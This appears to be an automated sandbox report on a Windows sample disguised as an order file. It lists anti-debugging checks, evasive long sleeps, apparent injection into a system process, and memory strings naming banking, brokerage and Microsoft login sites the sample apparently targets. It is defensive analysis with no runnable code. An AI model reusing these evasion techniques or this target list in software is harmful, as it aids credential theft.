Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: BA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: 2790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: 26D0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: 85A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: 95A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: 9790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: A790000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: B1E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: C1E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Order SO311180.exe Memory allocated: D1E0000 memory reserve | memory write watch Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E rdtsc 3_2_018C096E
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Order SO311180.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Window / User API: threadDelayed 9840 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Order SO311180.exe API coverage: 0.8 %
Source: C:\Windows\SysWOW64\EhStorAuthn.exe API coverage: 2.6 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Order SO311180.exe TID: 2036 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 1088 Thread sleep count: 134 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 1088 Thread sleep time: -268000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 1088 Thread sleep count: 9840 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe TID: 1088 Thread sleep time: -19680000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Code function: 7_2_030BC270 FindFirstFileW,FindNextFileW,FindClose, 7_2_030BC270
Source: C:\Users\user\Desktop\Order SO311180.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rdVMware20,11696487552
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: s002-5p.7.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: s002-5p.7.dr Binary or memory string: discord.comVMware20,11696487552f
Source: s002-5p.7.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ers - GDCDYNVMware20,11696487552p
Source: s002-5p.7.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: agement pageVMware20,11696487552.
Source: s002-5p.7.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: global block list test formVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: firefox.exe, 0000000A.00000002.2993673673.000001D9653CC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+
Source: s002-5p.7.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: s002-5p.7.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: Order SO311180.exe, 00000000.00000002.2212626239.00000000027F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vMCI@\
Source: s002-5p.7.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: GfSuWuMUukRRDP.exe, 00000008.00000002.3421006657.000000000144F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
Source: EhStorAuthn.exe, 00000007.00000002.3419665811.000000000337A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC%f
Source: s002-5p.7.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: s002-5p.7.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: s002-5p.7.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: s002-5p.7.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: s002-5p.7.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: s002-5p.7.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: s002-5p.7.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: s002-5p.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hdfcbank.comVMware20,11696487552
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,116/
Source: EhStorAuthn.exe, 00000007.00000002.3425079533.00000000082A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: active Brokers - EU WestVMware20
Source: s002-5p.7.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: s002-5p.7.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Users\user\Desktop\Order SO311180.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\Order SO311180.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C096E rdtsc 3_2_018C096E
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_004177F3 LdrLoadDll, 3_2_004177F3
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C0185 mov eax, dword ptr fs:[00000030h] 3_2_018C0185
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190019F mov eax, dword ptr fs:[00000030h] 3_2_0190019F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190019F mov eax, dword ptr fs:[00000030h] 3_2_0190019F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190019F mov eax, dword ptr fs:[00000030h] 3_2_0190019F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190019F mov eax, dword ptr fs:[00000030h] 3_2_0190019F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187A197 mov eax, dword ptr fs:[00000030h] 3_2_0187A197
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187A197 mov eax, dword ptr fs:[00000030h] 3_2_0187A197
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187A197 mov eax, dword ptr fs:[00000030h] 3_2_0187A197
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01924180 mov eax, dword ptr fs:[00000030h] 3_2_01924180
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01924180 mov eax, dword ptr fs:[00000030h] 3_2_01924180
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193C188 mov eax, dword ptr fs:[00000030h] 3_2_0193C188
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193C188 mov eax, dword ptr fs:[00000030h] 3_2_0193C188
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019461C3 mov eax, dword ptr fs:[00000030h] 3_2_019461C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019461C3 mov eax, dword ptr fs:[00000030h] 3_2_019461C3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018FE1D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018FE1D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE1D0 mov ecx, dword ptr fs:[00000030h] 3_2_018FE1D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018FE1D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018FE1D0 mov eax, dword ptr fs:[00000030h] 3_2_018FE1D0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019561E5 mov eax, dword ptr fs:[00000030h] 3_2_019561E5
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B01F8 mov eax, dword ptr fs:[00000030h] 3_2_018B01F8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01940115 mov eax, dword ptr fs:[00000030h] 3_2_01940115
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 mov ecx, dword ptr fs:[00000030h] 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 mov eax, dword ptr fs:[00000030h] 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 mov eax, dword ptr fs:[00000030h] 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192A118 mov eax, dword ptr fs:[00000030h] 3_2_0192A118
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov ecx, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov ecx, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov ecx, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov eax, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E10E mov ecx, dword ptr fs:[00000030h] 3_2_0192E10E
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B0124 mov eax, dword ptr fs:[00000030h] 3_2_018B0124
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01918158 mov eax, dword ptr fs:[00000030h] 3_2_01918158
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187C156 mov eax, dword ptr fs:[00000030h] 3_2_0187C156
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01914144 mov eax, dword ptr fs:[00000030h] 3_2_01914144
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01914144 mov eax, dword ptr fs:[00000030h] 3_2_01914144
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01914144 mov ecx, dword ptr fs:[00000030h] 3_2_01914144
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01914144 mov eax, dword ptr fs:[00000030h] 3_2_01914144
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01914144 mov eax, dword ptr fs:[00000030h] 3_2_01914144
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886154 mov eax, dword ptr fs:[00000030h] 3_2_01886154
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01886154 mov eax, dword ptr fs:[00000030h] 3_2_01886154
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954164 mov eax, dword ptr fs:[00000030h] 3_2_01954164
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01954164 mov eax, dword ptr fs:[00000030h] 3_2_01954164
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188208A mov eax, dword ptr fs:[00000030h] 3_2_0188208A
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018780A0 mov eax, dword ptr fs:[00000030h] 3_2_018780A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019460B8 mov eax, dword ptr fs:[00000030h] 3_2_019460B8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019460B8 mov ecx, dword ptr fs:[00000030h] 3_2_019460B8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019180A8 mov eax, dword ptr fs:[00000030h] 3_2_019180A8
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019020DE mov eax, dword ptr fs:[00000030h] 3_2_019020DE
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018880E9 mov eax, dword ptr fs:[00000030h] 3_2_018880E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187A0E3 mov ecx, dword ptr fs:[00000030h] 3_2_0187A0E3
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019060E0 mov eax, dword ptr fs:[00000030h] 3_2_019060E0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187C0F0 mov eax, dword ptr fs:[00000030h] 3_2_0187C0F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018C20F0 mov ecx, dword ptr fs:[00000030h] 3_2_018C20F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01904000 mov ecx, dword ptr fs:[00000030h] 3_2_01904000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01922000 mov eax, dword ptr fs:[00000030h] 3_2_01922000
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E016 mov eax, dword ptr fs:[00000030h] 3_2_0189E016
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E016 mov eax, dword ptr fs:[00000030h] 3_2_0189E016
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E016 mov eax, dword ptr fs:[00000030h] 3_2_0189E016
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E016 mov eax, dword ptr fs:[00000030h] 3_2_0189E016
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01916030 mov eax, dword ptr fs:[00000030h] 3_2_01916030
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187A020 mov eax, dword ptr fs:[00000030h] 3_2_0187A020
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187C020 mov eax, dword ptr fs:[00000030h] 3_2_0187C020
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01906050 mov eax, dword ptr fs:[00000030h] 3_2_01906050
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01882050 mov eax, dword ptr fs:[00000030h] 3_2_01882050
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018AC073 mov eax, dword ptr fs:[00000030h] 3_2_018AC073
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A438F mov eax, dword ptr fs:[00000030h] 3_2_018A438F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A438F mov eax, dword ptr fs:[00000030h] 3_2_018A438F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187E388 mov eax, dword ptr fs:[00000030h] 3_2_0187E388
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187E388 mov eax, dword ptr fs:[00000030h] 3_2_0187E388
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187E388 mov eax, dword ptr fs:[00000030h] 3_2_0187E388
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878397 mov eax, dword ptr fs:[00000030h] 3_2_01878397
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878397 mov eax, dword ptr fs:[00000030h] 3_2_01878397
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01878397 mov eax, dword ptr fs:[00000030h] 3_2_01878397
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019243D4 mov eax, dword ptr fs:[00000030h] 3_2_019243D4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019243D4 mov eax, dword ptr fs:[00000030h] 3_2_019243D4
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0188A3C0 mov eax, dword ptr fs:[00000030h] 3_2_0188A3C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018883C0 mov eax, dword ptr fs:[00000030h] 3_2_018883C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018883C0 mov eax, dword ptr fs:[00000030h] 3_2_018883C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018883C0 mov eax, dword ptr fs:[00000030h] 3_2_018883C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018883C0 mov eax, dword ptr fs:[00000030h] 3_2_018883C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E3DB mov eax, dword ptr fs:[00000030h] 3_2_0192E3DB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E3DB mov eax, dword ptr fs:[00000030h] 3_2_0192E3DB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E3DB mov ecx, dword ptr fs:[00000030h] 3_2_0192E3DB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192E3DB mov eax, dword ptr fs:[00000030h] 3_2_0192E3DB
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019063C0 mov eax, dword ptr fs:[00000030h] 3_2_019063C0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0193C3CD mov eax, dword ptr fs:[00000030h] 3_2_0193C3CD
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018903E9 mov eax, dword ptr fs:[00000030h] 3_2_018903E9
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018B63FF mov eax, dword ptr fs:[00000030h] 3_2_018B63FF
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0189E3F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0189E3F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0189E3F0 mov eax, dword ptr fs:[00000030h] 3_2_0189E3F0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BA30B mov eax, dword ptr fs:[00000030h] 3_2_018BA30B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BA30B mov eax, dword ptr fs:[00000030h] 3_2_018BA30B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BA30B mov eax, dword ptr fs:[00000030h] 3_2_018BA30B
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0187C310 mov ecx, dword ptr fs:[00000030h] 3_2_0187C310
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018A0310 mov ecx, dword ptr fs:[00000030h] 3_2_018A0310
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01958324 mov eax, dword ptr fs:[00000030h] 3_2_01958324
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01958324 mov ecx, dword ptr fs:[00000030h] 3_2_01958324
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01958324 mov eax, dword ptr fs:[00000030h] 3_2_01958324
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01958324 mov eax, dword ptr fs:[00000030h] 3_2_01958324
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01928350 mov ecx, dword ptr fs:[00000030h] 3_2_01928350
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0194A352 mov eax, dword ptr fs:[00000030h] 3_2_0194A352
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov eax, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov eax, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov eax, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov ecx, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov eax, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0190035C mov eax, dword ptr fs:[00000030h] 3_2_0190035C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01902349 mov eax, dword ptr fs:[00000030h] 3_2_01902349
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0195634F mov eax, dword ptr fs:[00000030h] 3_2_0195634F
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_0192437C mov eax, dword ptr fs:[00000030h] 3_2_0192437C
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BE284 mov eax, dword ptr fs:[00000030h] 3_2_018BE284
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_018BE284 mov eax, dword ptr fs:[00000030h] 3_2_018BE284
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01900283 mov eax, dword ptr fs:[00000030h] 3_2_01900283
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01900283 mov eax, dword ptr fs:[00000030h] 3_2_01900283
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_01900283 mov eax, dword ptr fs:[00000030h] 3_2_01900283
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019162A0 mov eax, dword ptr fs:[00000030h] 3_2_019162A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019162A0 mov ecx, dword ptr fs:[00000030h] 3_2_019162A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019162A0 mov eax, dword ptr fs:[00000030h] 3_2_019162A0
Source: C:\Users\user\Desktop\Order SO311180.exe Code function: 3_2_019162A0 mov eax, dword ptr fs:[00000030h] 3_2_019162A0
